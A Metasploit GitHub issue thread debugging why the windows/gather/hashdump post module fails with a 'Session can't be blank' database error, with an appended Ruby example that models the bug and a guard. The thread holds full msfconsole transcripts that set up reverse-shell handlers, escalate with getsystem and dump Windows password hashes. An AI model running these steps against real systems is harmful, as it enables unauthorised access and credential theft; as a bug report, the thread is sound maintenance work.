rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

post/windows/gather/hashdump throws error #12208

Open haxpak opened 5 years ago

haxpak commented 5 years ago
[*] Dumping password hashes...

[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
[-] Call stack:
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:79:in `raise_record_invalid'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/validations.rb:43:in `save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/attribute_methods/dirty.rb:29:in `save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:291:in `block in save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:351:in `block in with_transaction_returning_status'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `block in transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/transaction.rb:184:in `within_new_transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract/database_statements.rb:213:in `transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:220:in `transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:348:in `with_transaction_returning_status'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/transactions.rb:291:in `save!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/persistence.rb:51:in `create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:151:in `block in create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:302:in `scoping'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:151:in `create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activerecord-4.2.11.1/lib/active_record/relation.rb:159:in `first_or_create!'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:446:in `block in create_credential_origin_session'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:621:in `retry_transaction'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:445:in `create_credential_origin_session'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:358:in `create_credential_origin'
[-]   /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit/credential/creation.rb:119:in `create_credential'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:6:in `block in create_credential'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:166:in `data_service_operation'
[-]   /usr/share/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:5:in `create_credential'
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:34:in `create_credential'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:95:in `block in run'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:87:in `each'
[-]   /usr/share/metasploit-framework/modules/post/windows/gather/hashdump.rb:87:in `run'

Steps to reproduce

How'd you do it?

  1. Connect to client using meterpreter/x64/reverse_https
  2. on meterpreter obtain system -> getsystem
  3. bg
  4. use post/windows/gather/hashdump
  5. set session 1 (session number of active meterpreter session)
  6. run

Expected behavior

We should see the hashdump on the screen, and it should also be stored in the Postgres database.

What happens instead?

[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/post.rb:122:in `cmd_run'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:151:in `run'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
[08/17/2019 11:25:49] [e(0)] core: /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
[08/17/2019 11:25:49] [e(0)] core: /usr/bin/msfconsole:49:in `<main>'
[08/17/2019 11:25:49] [e(0)] core: Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank

OS

Kali Linux

bwatters-r7 commented 5 years ago

Can you tell us the target OS and what your database service is (remote/local/none)?

msf5 post(windows/gather/hashdump) > db_status
[*] postgresql selected, no connection

Or

msf5 exploit(windows/smb/psexec) > db_status
[*] Connected to remote_data_service: (https://localhost:5443). Connection type: http. Connection name: local-https-data-service.

I ran it with both the remote DB connection and local disconnected against Windows 10 x64 and it worked for both.

meterpreter > sysinfo
Computer        : WIN10X64_1511
OS              : Windows 10 (Build 10586).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 3...
msf5 exploit(windows/smb/psexec) > use post/windows/gather/hashdump 
msf5 post(windows/gather/hashdump) > set session 3
session => 3
msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3afb4f40e2ad2583812554f817f390c5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...
[redacted]
[*] Post module execution completed
msf5 post(windows/gather/hashdump) > 
bcoles commented 5 years ago

This issue may be related to #10129. The second part of the issue was never resolved.

That is, the "Validation failed: Session can't be blank. See log for more details." error is still thrown if the database is connected after receiving a session.

bcook-r7 commented 5 years ago

@haxpak did you reconnect or disconnect the database while framework was running when doing this? Or was the database always connected?

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

dwelch-r7 commented 1 year ago

Closing as can't replicate

bcoles commented 1 year ago

Steps to reproduce:

  1. Start metasploit without a database connection
  2. Get a session
  3. Connect to a database
  4. run post/windows/gather/hashdump on the session

As per https://github.com/rapid7/metasploit-framework/issues/12208#issuecomment-523506379 :

# ./msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.200.130; set lport 1337; set ExitOnSession false; run -j; set payload windows/x64/shell/reverse_tcp; set lport 1338; run -jz"
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.1.0/stringio.so: warning: already initialized constant StringIO::VERSION
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
lhost => 192.168.200.130
lport => 1337
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:1337 
payload => windows/x64/shell/reverse_tcp
lport => 1338
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:1338 

msf6 exploit(multi/handler) > 
msf6 exploit(multi/handler) > db_status
[*] postgresql selected, no connection
msf6 exploit(multi/handler) > hosts
[-] Database not connected
msf6 exploit(multi/handler) > 
[*] Sending stage (200774 bytes) to 192.168.200.190
[*] Meterpreter session 1 opened (192.168.200.130:1337 -> 192.168.200.190:1193) at 2023-06-06 09:31:23 -0400

msf6 exploit(multi/handler) > use post/windows/gather/hashdump 
msf6 post(windows/gather/hashdump) > set session 1
session => 1
msf6 post(windows/gather/hashdump) > db_connect msf:msf@127.0.0.1:5436/msf
[*] Connected to Postgres data service: 127.0.0.1/msf
msf6 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 9f288f41951f8dedc8c2011fcef7627f...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
[*] Post module execution completed
msf6 post(windows/gather/hashdump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 1? [y/N]  
msf6 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 9f288f41951f8dedc8c2011fcef7627f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

asdf:"asdf"

[*] Dumping password hashes...

[-] Post failed: ActiveRecord::RecordInvalid Validation failed: Session can't be blank
[-] Call stack:
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/validations.rb:80:in `raise_validation_error'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/validations.rb:53:in `save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:302:in `block in save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:354:in `block in with_transaction_returning_status'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/connection_adapters/abstract/transaction.rb:319:in `block in within_new_transaction'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:25:in `handle_interrupt'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:25:in `block in synchronize'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:21:in `handle_interrupt'
[-]   /var/lib/gems/3.1.0/gems/activesupport-7.0.4.3/lib/active_support/concurrency/load_interlock_aware_monitor.rb:21:in `synchronize'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/connection_adapters/abstract/transaction.rb:317:in `within_new_transaction'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/connection_adapters/abstract/database_statements.rb:316:in `transaction'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:350:in `with_transaction_returning_status'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/transactions.rb:302:in `save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/suppressor.rb:54:in `save!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/persistence.rb:55:in `create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:870:in `_create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:115:in `block in create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:881:in `_scoping'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:428:in `scoping'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:115:in `create!'
[-]   /var/lib/gems/3.1.0/gems/activerecord-7.0.4.3/lib/active_record/relation.rb:124:in `first_or_create!'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:448:in `block in create_credential_origin_session'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:628:in `retry_transaction'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:447:in `create_credential_origin_session'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:360:in `create_credential_origin'
[-]   /var/lib/gems/3.1.0/gems/metasploit-credential-6.0.5/lib/metasploit/credential/creation.rb:119:in `create_credential'
[-]   /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:6:in `block in create_credential'
[-]   /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/core.rb:164:in `data_service_operation'
[-]   /root/Desktop/metasploit-framework/lib/metasploit/framework/data_service/proxy/credential_data_proxy.rb:5:in `create_credential'
[-]   /root/Desktop/metasploit-framework/lib/msf/core/auxiliary/report.rb:40:in `create_credential'
[-]   /root/Desktop/metasploit-framework/modules/post/windows/gather/hashdump.rb:102:in `block in run'
[-]   /root/Desktop/metasploit-framework/modules/post/windows/gather/hashdump.rb:94:in `each'
[-]   /root/Desktop/metasploit-framework/modules/post/windows/gather/hashdump.rb:94:in `run'
[*] Post module execution completed
msf6 post(windows/gather/hashdump) >
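The two reproductions above (bcoles's note that the error appears when the database is connected after the session arrives, and the full msfconsole transcript) both point at the same mechanism visible in the stack trace: `create_credential` is called with an origin of type session, and `create_credential_origin_session` refuses to save a row whose session id is nil. A session opened while `db_status` reports "no connection" never gets a database record, so connecting afterwards does not backfill it. The following Ruby is an added example, not code from the Metasploit project: it models that validation with a small stand-in store, parses pwdump-style lines, and shows a guard a post module could apply. The names `Session#db_record`, `CredentialStore`, `report_hashes` and the option keys are assumptions for the illustration; the sample hash lines are constructed (they carry the well-known empty LM and NT hashes).

```ruby
# Added example, not Metasploit code. Models why hashdump raises
# "Validation failed: Session can't be blank" and how to guard against it.

# Stand-in for a Meterpreter session. A session opened before `db_connect`
# has no database row, so db_record is nil (assumed attribute name).
Session  = Struct.new(:sid, :db_record, keyword_init: true)
DbRecord = Struct.new(:id, keyword_init: true)

# Stand-in for the credential store. Reproduces the validation seen in the
# stack trace: a :session origin requires a non-nil session id.
class CredentialStore
  class RecordInvalid < StandardError; end

  attr_reader :rows

  def initialize
    @rows = []
  end

  def create_credential(opts)
    if opts[:origin_type] == :session && opts[:session_id].nil?
      raise RecordInvalid, "Validation failed: Session can't be blank"
    end
    @rows << opts
    opts
  end
end

# One pwdump-style line: user:rid:lmhash:ntlmhash:::
HASH_LINE = /\A(?<user>[^:]+):(?<rid>\d+):(?<lm>\h{32}):(?<ntlm>\h{32}):::\z/

# Constructed sample output; both hashes are the well-known empty-password values.
SAMPLE_HASHDUMP = [
  'Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::',
  'Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::',
  'this line is not a hash'
].freeze

# Parse one hashdump line into a hash, or nil when the line is malformed.
def parse_hash_line(line)
  m = HASH_LINE.match(line.strip)
  return nil unless m

  { user: m[:user], rid: m[:rid].to_i, lm: m[:lm].downcase, ntlm: m[:ntlm].downcase }
end

# Store dumped hashes with a session origin. Returns [stored, skipped]:
# `stored` holds the credential option hashes handed to the store, `skipped`
# lists users whose hash could not be stored because the session has no
# database record. With guard: false the unguarded behaviour from the issue
# is reproduced and the store raises RecordInvalid on the first user.
def report_hashes(store, session, lines, workspace_id: 1, guard: true)
  stored  = []
  skipped = []
  return [stored, skipped] if store.nil? # database not connected: print only

  lines.each do |line|
    h = parse_hash_line(line)
    next if h.nil?

    if guard && session.db_record.nil?
      skipped << h[:user]
      next
    end

    stored << store.create_credential(
      origin_type: :session,
      session_id: session.db_record && session.db_record.id,
      post_reference_name: 'windows/gather/hashdump',
      private_type: :ntlm_hash,
      private_data: "#{h[:lm]}:#{h[:ntlm]}",
      username: h[:user],
      workspace_id: workspace_id
    )
  end
  [stored, skipped]
end

if $PROGRAM_NAME == __FILE__
  store = CredentialStore.new
  # Session created before db_connect: nothing can be attributed to it.
  _, skipped = report_hashes(store, Session.new(sid: 1, db_record: nil), SAMPLE_HASHDUMP)
  puts "skipped (no session record): #{skipped.join(', ')}"
  # Session created while the database was connected: rows are stored.
  stored, = report_hashes(store, Session.new(sid: 3, db_record: DbRecord.new(id: 7)), SAMPLE_HASHDUMP)
  puts "stored: #{stored.size}"
end
```

The practical takeaway for users matches bcoles's ordering: connect the database before the handler receives the session, or re-establish the session after `db_connect`, so the session has a record to attach credentials to. For module authors the guard is the point: a nil session record should degrade to printing the hashes, not abort the run after the hashes were already decrypted.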